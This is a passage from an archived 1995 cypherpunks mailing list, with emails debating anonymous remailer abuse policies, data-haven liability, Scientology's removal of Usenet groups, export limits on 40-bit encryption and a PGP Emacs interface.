rather embarassing to the "hot shots" in Cupertino :)
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 16 Jan 95 23:37:38 PST
To: hroller@metronet.com
Subject: Re: Abuse Complaint out of homer@rahul.net
Message-ID: <9501170734.AA09389@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael wrote, to Homer and the lists
>      I am going to have to agree with you on this.
> A Sysadmin would have to see the messages or data that is 
> supposed to be harassing the complainant.  What I say is harassment
> may be different from what you say it is.

There's different levels of harassment.  For the kind that says
1) "Don't send me any of this junk mail any more", 
if the recipient wants to define junk mail to the remailer-operator, 
there's no ethical problem if the operator wants to block remailed mail
to the recipient, though it's good form in non-remailer-chain
environments for the operator to issue a bouncegram if possible.
If the recipient has to pay per byte/message to receive mail,
or the amount transmitted is really excessive, then this is
certainly something an operator ought to do to avoid problems.

(It's potentially bad form for a for-profit operator to cash
digicash postage for delivering the messages if he doesn't,
at least without a warning in his pricing policy advertisment.)

If the operator doesn't want to block remail to an unwilling
recipient, the ethical and legal questions become more interesting.
The question of whether the "don't bug me" list gets published
is also interesting.

For the kind of harassment complaint that says 
2) "Block all remail to me from this destination",
there are implementation issues - can the remailer perform
checks like this before doing the header-munging?
Is there more security risk? Of course, with chaining,
it's a lot less useful.

For the kind of complaint that says
3) "Block all remail to this group of people",
there's the question of whether the requester is authorized
to request that for the entire group - newsgroups are an
especially interesting problem.  Julf's remailer blocks
posting to some newsgroups, because the readers have done
the usual net.poll and decided they'd like him to block it,
since lots of the remail was spam.  But especially with newsgroups,
it's easy for the recipient to trash incoming articles from the remailers.

		Bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 16 Jan 95 23:44:56 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: Abuse and Remailer Ethics
Message-ID: <9501170741.AA09451@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


>      OK, I understood all this.  I am afraid that if we implement a total
> no tracing scenario, then remailers will come under heat from the world at
> large and the governments.  Maybe not.  Rright now, Rahul (a good guy) is
> implementing syslogs whether I want him to or not, and that isn't about to
> change.  Really I would have to be the owner of my own system in order to
> do what you are suggesting. 

You can do a good job of anonymous remailing even on a system that
keeps email logs, if the system is otherwise trustable.
When mail comes in to your remailer, store it in a file (encrypted....).
Periodically take the files of stored messages, shuffle them,
and mail them out.  It's about the same behavior as doing the same
from your own box with eavesdroppers on your network, though
the traffic levels are a bit different if each remailer operator
on rahul.net gets identified separately instead of all the remailers
getting lumped together.  But if there are multiple remailers on
Rahul's machine, and if the syslogs don't log internal mail,
you could also forward some of the remailer traffic randomly
through other remailer-operators there.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 17 Jan 95 03:01:38 PST
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: Scientologys Attempts
In-Reply-To: <9501161644.AA06046@elysion.iaks.ira.uka.de>
Message-ID: <Pine.SUN.3.91.950117025818.2086B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 16 Jan 1995, Hadmut Danisch wrote:

> 
> I just had a view into the alt.religion.scientology and
> alt.clearing.technology newsgroups. There are some messages
> about a Scientology decision to shut down every internet traffic
> about Scientology. If the messages are true, Scientology sent 
> rmgroup Control messages to remove the groups. 
> 
> The request to stop the remailers seems to come from the
> same people...
> 
After reading the lawyer's threatening letter I tried to check out the 
two newsgroups mentioned, and was told they do not exist.  (This is not a 
local filter here; Eskimo does not censor newsgroups.)  So have they been 
deleted?  If so, by whom and how? What is 'rmgroup' and who has the 
authority to remove alt. groups?

Charles Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 17 Jan 95 00:09:21 PST
To: yusuf921@uidaho.edu (Syed Yusuf)
Subject: Re: FBI and BLACKNET
In-Reply-To: <Pine.HPP.3.91.950112170758.18085D-100000@goshawk.csrv.uidaho.edu>
Message-ID: <m0rU8z7-0002GdC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 11 Jan 1995, Samuel Kaplin wrote (about FBI interest in BlackNet)
> 
> > I hope they took you someplace nice for lunch...You might want to file a
> > FOI request on yourself, just to see how much they censor. ;) They might
> > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;)
> 
> For the benifit of myself and the list, how would you go about doing that?

Also would be useful to know the equivalent procedures for Canada, UK, etc.

Filing such a request would probably get a file opened on you, too, but
so what?  The more these files fill up with innocent people the more
useless they get.  Perhaps everyone ought to sign up their granny to 
receive the Loompanics catalog or 2600, as a way to generate noise.

Regarding BlackNet, I am not sure that they are not *run* by the FBI,
or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental 
entity.  Such agencies must realize that traffic in secrets is possible,
inevitable, and would probably love to put themselves first in line to 
buy.  Think of the value:  embarrass rival agencies, identify leaks (if not
sources), raise funds for clandestine operations through resale or blackmail,
etc. Security agencies have often engaged in smuggling as a form of entrapment,
and/or fundraising;  Consider Iran-Contra as a recent high-level example.  The
mandate to trap offenders in a 'sting' also provides a handy alibi to excuse
such operations if they are ever exposed.  Citizens have no such protections.

Even a record of successful dealings with BlackNet would mean little.  If it
were run by, say, the Nuclear Non-Proliferation Commission, then presumably
it would purchase non-nuclear secrets at high prices to build up credibility.
When a nuclear secret was offered for sale it would spare no expense to find 
the source.  In fact the 'highest bidder' for a secret would often be the
embarrassed/enraged agency responsible for preventing its leak.  At the very
least such agencies could be expected to deal secretly with the BlackNets...
why search out a secret yourself if you can buy it on the 'open' market?

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 17 Jan 95 00:32:34 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <9501170829.AA10034@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael wrote:
> 	This entire discussion is completely unnecessary. There are ways 
> of removing operator liability without examining the submission at all.

Liability is a legal issue, not a technical one.
(Catchability is a technical issue.)
The basic ways to remove liability are to either run your system
where the local laws don't object to information storage,
or to reduce the operator's involvement to levels that the
local legal system will tolerate.  The former case is easy,
if you can rent computer space in a country with a non-meddling
government and good net access (or an easily rentable government :-).)
For those of us in the latter situation, the discussion's still
useful...

On Mon, 16 Jan 1995, Johnathan Corgan wrote:
> > It just occurred to me when reading this another method for ensuring
> > the "I can't tell what's in it" condition with a data haven operator.
> > Why not use a secret sharing system where the contraband data is 
> > split into a number of pieces and sent to different havens?

Good, but still has most of the same old risks.

Alice asks Dave's Data Haven to store stuff, and later retrieves it.
Dave doesn't want to be able to know what's in it.
There are three main threat periods - at receipt of the data,
during storage, and at retrieval.  Secret sharing is great for
the storage period, assuming the data havens are in different
jurisdictions and the cops can't force the operator (Dave)
to go retrieve all the pieces.  

However, at receipt of the data, it's all in one place, Dave's inbox.
If Alice encrypted it safely, or secret-shared it herself, great!
But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime,
or Alice's key has been compromised, anything in Dave's inbox is
still toast, even if anything that's been split and stored is safer
than if it had been stored unsplit.  So he either needs to split it fast,
shortening the window, or find a way to blind his mail before processing it,
or split it before reading it.

Splitting before reading isn't impossible in a stream environment.
Define a protocol that looks like SMTP, but opens up three outgoing 
streams as well as an incoming stream, and uses standard mail formats.
While reading the headers from Alice (either the real contents or just the
handshakes at the beginning), Dave's receiver thinks about them
and sends some meaningful headers to Moe, Larry, and Curly.
Once the message body starts, instead of storing the incoming bytes,
Dave sends every other byte to Moe or Larry, and the xors to Curly.*
If he wants to get fancy, he can even encrypt the data with a stream
cypher as he goes along, giving half the key to each of them.
That way, Dave's system really only has knowledge of the headers,
plus one line at a time of incriminating data on the fly.
And his partners can't give anything away either; they're just stooges.

* If the connections to and storage by Moe and Larry are reliable enough,
Curly doesn't really need to be involved, but the xor business lets
you reconstruct everything from just two parts.


			Bill
			
"Privacy is not a crime!"			




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com (Dave Del Torto)
Date: Tue, 17 Jan 95 06:32:57 PST
To: cypherpunks@toad.com
Subject: Re: Jude Milhon in WIRED
Message-ID: <ab417acf2a021003441c@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Anyone with any dang sense left at all knows that St. Jude is the secret
CypherGoddess behind this whole eff-in' thing, besides being the Patron
Saint of Hopeless Causes...    ;)

   dave
_________________________________________________________________________
"There are three sides to every issue: my side, your side and the side of
 the truth." -Babatunde Olatunji






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 17 Jan 95 09:00:09 PST
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: Scientologys Attempts
In-Reply-To: <9501171221.AA06681@elysion.iaks.ira.uka.de>
Message-ID: <Pine.3.89.9501170859.A3034-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Hadmut Danisch wrote:
> 
> > So have they been 
> > deleted?  If so, by whom and how? 
> 
> Find out...
> 
> 
> > What is 'rmgroup' and
> 
> The usenet method to remove groups. A special message
> with a control line in the header.
> 
> > who has the 
> > authority to remove alt. groups?

Anybody has the power.  Nobody has the authority.

It should be done only when there is a general consensus,
which is obviously not the case here.

This is a classic case of net abuse.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we  
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com

               http://www.catalog.com/jamesd/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff A Licquia <jalicqui@prairienet.org>
Date: Tue, 17 Jan 95 07:46:34 PST
To: cypherpunks@toad.com
Subject: Re: Scientologys Attempts
In-Reply-To: <Pine.SUN.3.91.950117025818.2086B-100000@eskimo.com>
Message-ID: <Pine.3.89.9501170901.E14013-0100000@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Charles Bell wrote:

> On Mon, 16 Jan 1995, Hadmut Danisch wrote:

> > I just had a view into the alt.religion.scientology and
> > alt.clearing.technology newsgroups. There are some messages
> > about a Scientology decision to shut down every internet traffic
> > about Scientology. If the messages are true, Scientology sent 
> > rmgroup Control messages to remove the groups. 
> > 
> > The request to stop the remailers seems to come from the
> > same people...

> After reading the lawyer's threatening letter I tried to check out the 
> two newsgroups mentioned, and was told they do not exist.  (This is not a 
> local filter here; Eskimo does not censor newsgroups.)  So have they been 
> deleted?  If so, by whom and how? What is 'rmgroup' and who has the 
> authority to remove alt. groups?

An 'rmgroup' is a control message used by Usenet when a group needs to be 
removed globally.  Etiquette suggests that only big, important people 
should send these out, but technically anyone can send one.

I followed the Scientology debate with little interest until yesterday, 
when I fired up my newsreader and was asked "Subscribe to new group 
alt.religion.scientology?"  At that point, I knew that the real war had 
begun. :-)

From what I was able to ascertain here, an rmgroup was sent out, followed 
soon after by a newgroup (or two or three or...).  My news server doesn't 
honor newgroups in the alt hierarchy automatically as a rule, but did so 
in this case for some reason.

News server: news.cso.uiuc.edu, on the University of Illinois 
Urbana-Champaign campus.

----------------------------------------------------------------------
Jeff Licquia (lame .sig, huh?)   |   Finger for PGP 2.6 public key
jalicqui@prairienet.org          |   Me?  Speak for whom?  You've got
licquia@cei.com (work)           |     to be kidding!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael L. Acklin" <hroller@metronet.com>
Date: Tue, 17 Jan 95 08:14:44 PST
To: cypherpunks@toad.com
Subject: Premail PGP Keys
Message-ID: <Pine.HPP.3.90.950117100723.13854A-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Ralf,
	I hate to bother you, but I am setting up your premail program and 
tried the "premail -getkeys" but it never works. I tried to manually 
finger Matt's Pub Key area, but looks like he is down or has a different 
address. Is there somewhere else I can try to get the PGP Keys for the 
remailers, or does Matt have a different address? Any help would really 
be appreciated.
	Also does anyone have a patch for PINE 3.9X to get premail to work. 
I know I am kinda behind but just starting out and would really 
appreciate any help I can get. Again Thanks in Advance....


Mike Acklin   ----------------------> hroller@metronet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 17 Jan 95 10:27:45 PST
To: cypherpunks@toad.com
Subject: Scientology and remailers.
Message-ID: <Pine.3.89.9501171023.A9769-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Posting the truth about Scientology, in the face of
harassment and threats by scientologists, is an
excellent example of the legitimate use of remailers,
as is alt.abuse.recovery, and talk.politics.china


 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we  
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com

               http://www.catalog.com/jamesd/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 17 Jan 95 02:06:23 PST
To: cypherpunks@toad.com
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <ab40e69a010210049530@[132.162.201.201]>
Message-ID: <Pine.HPP.3.91.950117105356.16699A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



This thread illustrates (at least if setup's like this are
worthy of a place in Raph's list) that penet.fi is the safest
way to go for the moment. I would just hate it to have my
head on the plate of a remailer operator who takes an interest
in subtile ethical discussion of whether to sell me out or not.

Mats
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Beattie <beattie@CSOS.ORST.EDU>
Date: Tue, 17 Jan 95 12:28:42 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: (none)
In-Reply-To: <Pine.HPP.3.91.950117193541.25204A-100000@cor.sos.sll.se>
Message-ID: <Pine.3.88.9501171208.A21790-0100000@CSOS.ORST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Mats Bergstrom wrote:

> On Tue, 17 Jan 1995, Name withheld on request wrote:
> 
> > wonders to what end remailers are being put by people who are worried
> > about being "sold out".
> 
> The fundamental principle here is that an e-mail message is just so
> many bits of 1's and 0's. It can never, in it's own capacity, steal,
I disagree, one can use e-mail to steal.  E-mail consumes resources,
resources for which the sender may have no right to use.  If the sender
is sending messages which the recipient does not wish to receive then
his resources are being taken.  If the recipient has now way of stopping
the messages then the recipients resources are being taken against the
recipient's will and the recipient should be able to have the messages
stopped before they consume the recipients resources.

Brian Beattie         | [From an MIT job ad] "Applicants must also have
                      | extensive knowledge of UNIX, although they should
beattie@csos.orst.edu | have sufficently good programming taste to not
Fax (503)754-3406     | consider this an achievement."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Jan 95 09:53:02 PST
To: cypherpunks@toad.com
Subject: Re: Abuse and Remailer Ethics
Message-ID: <199501171752.MAA21698@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995 anonymous-remailer@xs4all.nl (Name withheld on request)
said: 
 
>This comment is grossly unfair.  Obviously Homer is going to a lot of
effort to  
>operate his remailer in the best way possible.   
> 
>It's easy for others to be critical.  "head on a plate" is a strong term
to  
>use, given Homer made it clear he would not reveal the identity of an
anonymous  
>user without a court order.  Also, one wonders to what end remailers are
being  
>put by people who are worried about being "sold out". 
> 
>It's always been a good policy to use a foreign mailer in a chain where  
>anonymity is critically important.  That doesn't mean it's OK to make
Homer the  
>whipping boy. 
 
 
I agree that it's a bit much to expect the remailer operator to heroically
perform beyond what any of us would do in the same lonely spot under
duress. 
 
Tim has written recently on another list that the USG grabs enemies in
other domains when the national interests are at stake -- the 800-pounder
can define any of its actions legal, or to hell with legal niceties as the
Beast opts, the picky lawyers can sort it out later, or never. 
 
Does not Duncan and others have wisdom on this:  Don't roll over out of
ignorance and faint-heartedness, but do carefully protect your keister,
with feet-on-ground planning, mercury-technology and out-wits.  Watch for
signs of sneak attack through the guy being squeezed next door, or by a
cahoots-machine zipping psy-war toot-alarms to foster fearful quiescence. 
 
Some warning examples may be in the offing in the rising heat of dreaded
horse-threats to civil society.  If so, some will be arranged by
provocateurs like past G-guy tricks. 
 
So it goes.  So what.  Nesta said, it's fun to lance swollen infected
over-controlling heads.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 17 Jan 95 04:23:00 PST
To: quester@eskimo.com
Subject: Re: Scientologys Attempts
Message-ID: <9501171221.AA06681@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> After reading the lawyer's threatening letter I tried to check out the 
> two newsgroups mentioned, and was told they do not exist.  (This is not a 
> local filter here; Eskimo does not censor newsgroups.)  

They still exist at our local server (E.I.S.S., University of Karlsruhe,
Germany) and contain messages (even from America). Seems as they were
successfull in deleting the group at some servers.



> So have they been 
> deleted?  If so, by whom and how? 

Find out...


> What is 'rmgroup' and

The usenet method to remove groups. A special message
with a control line in the header.

> who has the 
> authority to remove alt. groups?

Don't know...

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 17 Jan 95 13:28:41 PST
To: cypherpunks@toad.com
Subject: Re: Does encrypted equal safe?
In-Reply-To: <m0rU6g1-000kfxC@mill2.millcomm.com>
Message-ID: <199501172128.NAA06955@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: marko@millcomm.com (Mark Oeltjenbruns)

   >If you can't read it, it's not kiddie-porn *for you*, although it
   >might be for someone with the key.
   >
	   So the fact that its not kiddie-porn *for me* makes it safe *for me*
   to be transporting or storing for others that know it is kiddie-porn?

Do you want it to be, or not?

This is exactly the situation I was talking about when I emphasized
the need for a positive rhetoric.  We have here a situation for which
I see the need for a clear statement of position and persuasive
arguments in its favor.

The law gets created by discussion.  If we as a group fail to
articulate our positions, these positions won't be represented and,
failing other advocates (who?), will have no place in the law.  Legal
support of privacy technology will be necessary for its long term
acceptance.

The structure of the argument quoted below is primarily that of "this
can't be right".  I can only infer advocacy that operators of privacy
services must be primarily responsible for content.  This is to say
one of several things, none of which I desire.  It is to say privacy
service operators who don't know content and who don't know identity
should not exist, because no sane person would take upon themselves
the liability of the world.  It is alternately to say that privacy
service operators must know content and filter it.  It is alternately
to say that such operators must know identity and be able to transfer
liability, and these last two are not mutually exclusive.

If you don't want this situation, speak up now.  I desire the approved
existence of privacy services which offer true privacy and as
completely ignorant as possible operators of them.

   >Encryption fragments meaning subjectively.  A magazine, for example,
   >has a fixed center of meaning for all who can read the language.  A
   >magazine looks the same to all who look at it.  An encrypted file
   >looks different to those who have the key from those who do not.
   
   But why does the meaning of the data assume to change?

Because I want it to.

Meaning is subjective.  If I see encrypted text, am I to be held
responsible for having seen through an encryption for which I hold not
the key?  Merely because someone knows a transformation into a
disapproved form does not mean that I do.

   If I take my stack of kiddie-porn and put it in a box with a big
   strong lock on it, in a way physically encrypting it, change the
   meaning of what I have?

Ask your local postal or parcel service.  Is your local letter carrier
responsible for the possession of kiddie porn while walking around
with the mail in their sack?  I certainly hope not.  That would be a
ludicrous situation.

More accurately, it would be an outrage.  Pushing responsiblity for
interpretation, the ascertaining of meaning, onto people who transport
and store either physical goods or information would be to require
them to become deputies in enforcement.  The policeman inside indeed!
No one is required to love the State nor its dictates.

   >Encrypted data is fundamentally different from paper-and-ink data in
   >this way.  The metaphor of "planting it on somebody" does not apply to
   >data that the "somebody" can't read.

   It is fundamentally a different process, but does that make it
   different from the locking the physical data in a box as above?

It is identical in its removal of any knowledge of content from the
state of mind of the holder.

What is different is that encrypted data is even more clear in its
removal of knowledge.  With a physical container, the boundary of the
container can be breached.  With a crypto container, it is impossible.

   It seems to me that what you are saying is that because the data is
   in a form that I can't understand, I'm safe from trouble.  Now it seems to
   me that this is not all that different from changing the form or appearence
   of physical data and saying I'm not responsible for it.  

If you personally enclose a physical object, you haven't removed your
own state of knowledge about the contents.  But if you give the
package to someone else, they don't know the contents.  Even when the
package changes hands, the state of knowledge doesn't.

The War on Certain Drugs has had the unfortunate effect of stretching
the imputations of knowledge to holders of Certain Drugs.  If a single
person denies a state of knowledge, yet has physical possession of
some Certain Drug, a court may assume that the possessor is lying.

And the fact that certain situations like this have been legislated
badly makes them no less totalitarian.

On the other hand, someone in the business of taking packages from
many different people can reasonably argue that they have no specific
knowledge of the contents of any of them.

	   Now think of a remailer:  If somebody gave me this box of stuff,
   stuff that I had no idea of what it was since it was *locked up*, to
   transport over to location X and I got busted half way there am I safe?

I'll consider this a reasonable argument if you can show that some
analogous delivery service has been busted in this way.  And not all
delivery services are common carriers.

   Can I say that even though someone is using me to
   spam or distribute kiddie porn, I have no reason to try and stop it since I
   don't know what they are doing?  

I can tell from this situation that you yourself wouldn't not feel
comfortable running a remailer.  So don't do that.  I see you're
already not doing that; good.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 17 Jan 95 13:30:48 PST
To: cypherpunks@toad.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Chameleon.4.01.950116182254.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <199501172130.NAA06966@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Johnathan Corgan <jcorgan@scruznet.com>

   It just occurred to me when reading this another method for ensuring the
   "I can't tell what's in it" condition with a data haven operator.  Why not
   use a secret sharing system where the contraband data is split into a number
   of pieces and sent to different havens?
   [...]
   Ok, Eric, go ahead and blast your holes in this argument :)

How do you know that what you the operator of the storage service gets
was generated by secret sharing?

The suggestion of having certificates that say "I encrypted this" are
interesting, but merely transfer the problem onto that signer.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 17 Jan 95 10:48:34 PST
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: Abuse and Remailer Ethics
Message-ID: <ab41c1b306021004669b@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


>This thread illustrates (at least if setup's like this are
>worthy of a place in Raph's list) that penet.fi is the safest
>way to go for the moment. I would just hate it to have my
>head on the plate of a remailer operator who takes an interest
>in subtile ethical discussion of whether to sell me out or not.

If you chain it through 3 or 4 remailers with PGP, then pretty much all 3
or 4 of them have got to decide to sell you out.  I trust Julf a lot, but
I'm not sure I trust him four times as much as much as every other remailer
operator.  Or something like that.

You can also probably use penet as a link on your larger chain, although
I've never tried this to see how it works.

And I would note that the "subtle ethical discussion" seemed to consist of
the operator trying to figure out what he should do in the future about
this sort of thing, and he never even seemed to consider turning over the
name of the anon user.  Although he did acknowledge that in the future he
might, or might work with other operators to try and discover a True Name.
*shrug*






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Repenning <jackr@dblues.engr.sgi.com>
Date: Tue, 17 Jan 95 14:20:54 PST
To: cypherpunks@toad.com
Subject: pgp.el, as shown at the last PhysMeet
Message-ID: <12096.790381237@dblues.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


At this weekend's Physical Meeting, I demonstrated pgp.el, an
interface to PGP for use from GNU Emacs.  As I mentioned, this
package is available from the standard Emacs lisp archives and
other places.  However, the version I showed is advanced beyond
those sites, most notably in the use of color to highlight
various PGP messages, and in the "transparent decryption"
feature that I talked about the most.

If you'd like to look over this latest version, you can snarf it
from:

	       ftp.sgi.com:private/pgp-el.tar.gz

This version is still under test and development (notably, I
want to get the transparency working for rmail as well as mh-e,
and for sending as well as receiving).  Because it's not
finished yet, I've put it in the private/ directory, which is
protected against browsing.  When that's all finished, I'll be
publishing it again in the usual places.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Tue, 17 Jan 95 12:27:23 PST
To: cypherpunks@toad.com
Subject: Re: (none)
Message-ID: <9501172027.AA24378@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Mats Bergstrom wrote:
>On Tue, 17 Jan 1995, Name withheld on request wrote:
>
>> wonders to what end remailers are being put by people who are worried
>> about being "sold out".
>
>The fundamental principle here is that an e-mail message is just so
>many bits of 1's and 0's. It can never, in it's own capacity, steal,
>molest or kill. It is therefore not unethical to run a no-log 'fortress
>remailer' and auto-delete ALL complaints, without exception. It might
>not be feasible to do so if one wants to stay out of jail, but hope-
>fully this will change with the rapid increase in country domains
>and the soon-to-come digicash market. Discussions of programming to
>make fortress remailers work and to make them easily exportable to
>African Linux-boxes are interesting. So are discussions of expected
>repercussions on society. Ethical discussions of what is abuse or not
>are better left to the clergy.

Here comes the clergy! :-)

I'm sure that when your hypothetical remailer comes up and I decide to spam
you with your own words (now I wouldn't do that, now would I? ;-), your
sysadmin will be comforted by knowing that it's only ones and zeros filling
his hard disk.  He would be especially comforted if I spammed
postmaster@wherever.you.are rather than your own account in a move to
protect your own anonymity.

Advocating a remailer such as you describe is only possible in a world where
anonymity is considered the supreme good, a goal to achieve no matter how
many other ethical rules we break.  In the real world, however, there will
always be problems with "acceptable use" and "abuse", along with the
additional problems with establishing policy and so on.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kipp@warp.mcom.com (Kipp E.B. Hickman)
Date: Tue, 17 Jan 95 14:42:53 PST
To: P.vanMossel@telecom.ptt.nl
Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
Message-ID: <9501172240.AA05908@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <3fh5m0$7tg@hdxu03.telecom.ptt.nl>, you write:
> In article <marca-1201952123120001@boulanger.mcom.com>, marca@mcom.com 
> says...
> >
> >There's no question that 40-bit is less than one would prefer.
> >This is why we are/will be supporting 128-bit RC4, for example,
> >in US-only products, honoring United States government export
> >restrictions.
> 
> Marc, isn't it possible (legally) to deliver products with a replaceble 
> encryption library (dll). Delivery with a 40-bit key DLL. The user has 
> the option to install a dll with a different keysize. Somewhat like 
> winsock...
> 
> Yes, I've seen the article suggesting a foreign office. I think an open 
> interface would do gooed for the whole field. I.e. ftp, telnet, etc. as 
> well.

Actually, it's probably worse than you think:

There are govt's out there that won't let you import code that is
"encryption ready". You must prove that your software is tamper proof
before it can be imported, and tamper proofing means that you can't
bolt on security. Also, I believe the export laws disallow "plug in"
security in the US...

The crypto legal world sucks.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@xs4all.nl (Name withheld on request)
Date: Tue, 17 Jan 95 06:07:01 PST
To: cypherpunks@toad.com
Subject: (none)Re: Abuse and Remailer Ethics
In-Reply-To: <Pine.HPP.3.91.950117105356.16699A-100000@cor.sos.sll.se>
Message-ID: <199501171405.AA17997@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.HPP.3.91.950117105356.16699A-100000@cor.sos.sll.se>,
Mats Bergstrom <asgaard@sos.sll.se> wrote:
> 
> This thread illustrates (at least if setup's like this are
> worthy of a place in Raph's list) that penet.fi is the safest
> way to go for the moment. I would just hate it to have my
> head on the plate of a remailer operator who takes an interest
> in subtile ethical discussion of whether to sell me out or not.
> 
> Mats
>  
> 
This comment is grossly unfair.  Obviously Homer is going to a lot of
effort to operate his remailer in the best way possible.  

It's easy for others to be critical.  "head on a plate" is a strong
term to use, given Homer made it clear he would not reveal the
identity of an anonymous user without a court order.  Also, one
wonders to what end remailers are being put by people who are worried
about being "sold out".

It's always been a good policy to use a foreign mailer in a chain
where anonymity is critically important.  That doesn't mean it's OK
to make Homer the whipping boy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 17 Jan 95 12:33:02 PST
To: cypherpunks@toad.com
Subject: Internet News: NNBC News Story moved to tonight (Tuesday) (fwd)
Message-ID: <Pine.SOL.3.90.950117152737.366A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 17 Jan 1995 14:23:11 -0500
From: Craig Peterson <craig@Mainstream.com>
To: Multiple recipients of list <rkba-alert@gatekeeper.nra.org>
Subject: INFO: NBC Nightly News Story moved to tonight (Tuesday)

A story regarding the Internet, with some sort of mention of NRA.org,
should be on the NBC Nightly News with Tom Brokaw tonight.

Craig.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 17 Jan 95 12:35:13 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <Pine.HPP.3.91.950117105356.16699A-100000@cor.sos.sll.se>
Message-ID: <9501172032.AA29703@cfdevx1.lehman.com>
